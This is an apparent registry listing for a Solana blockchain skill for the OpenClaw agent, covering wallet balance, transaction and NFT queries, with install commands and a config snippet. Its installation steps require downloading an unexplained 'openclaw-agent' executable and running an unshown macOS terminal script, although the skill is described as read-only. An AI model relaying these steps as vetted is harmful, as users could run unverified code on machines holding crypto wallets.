ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Integrate Solana blockchain capabilities into OpenClaw. Track wallet balances, view transactions, manage SPL tokens, and analyze NFTs using CLI-powered tools.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-d95dl
Or

What This Skill Does

The solana skill enables the OpenClaw AI agent to interface directly with the Solana blockchain. It acts as a bridge between your agent and the decentralized ledger, allowing for real-time querying of wallet balances, transaction histories, and SPL token holdings. Designed for both developers and casual crypto users, it leverages the Solana CLI and specialized utilities like Metaboss to provide a command-line interface for managing digital assets. Whether you need to track a specific wallet for incoming transactions, inspect NFT metadata via mint addresses, or verify staking positions, this skill provides the underlying hooks to perform these actions securely and efficiently.

Installation

To use this skill, you must ensure the openclaw-agent binary is properly installed on your system, as it acts as the execution layer for all blockchain commands.

  1. Install the skill using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-d95dl
  2. For Windows users, download the agent from the GitHub repository and ensure the executable is in your PATH.
  3. For macOS, follow the terminal script instructions provided in the skill prerequisites to initialize the environment.
  4. Ensure the Solana CLI is installed globally on your machine to facilitate command execution.
  5. Set your RPC provider using solana config set --url <URL> to ensure accurate data retrieval from the network.

Use Cases

  • Financial Tracking: Monitor your total SOL balance and SPL token diversification across multiple wallets without using a web browser.
  • NFT Management: Use the Metaboss integration to decode NFT metadata, identify traits, and verify ownership status of specific mints.
  • DeFi Monitoring: Track your staked accounts and analyze recent transaction activity for specific addresses to maintain awareness of wallet movements.
  • Development Auditing: Perform rapid account data lookups and confirm transaction signatures directly from your IDE or terminal workflow.

Example Prompts

  1. "Check the current SOL balance for wallet address 7xKYTET6... and list all my SPL tokens."
  2. "Show me the last 5 transactions for this account and confirm if the recent transfer was successful."
  3. "Decode the metadata for NFT mint address 9vMFrza... and tell me the collection details."

Tips & Limitations

  • Performance: Always use a reliable RPC provider (like Helius or QuickNode) instead of the default public endpoints for production-grade speed and consistency.
  • Security: Never share your private keys or seed phrases with the agent. This skill is designed for read-only blockchain analysis.
  • Dependencies: Ensure you have Rust and Cargo installed if you plan to utilize the metaboss functionality for advanced NFT analysis.
  • Network: The skill defaults to Mainnet, but you can easily switch to devnet for safe testing of experimental commands.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-d95dl": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#finance
Safety Score: 4/5

Flags: network-access, code-execution, external-api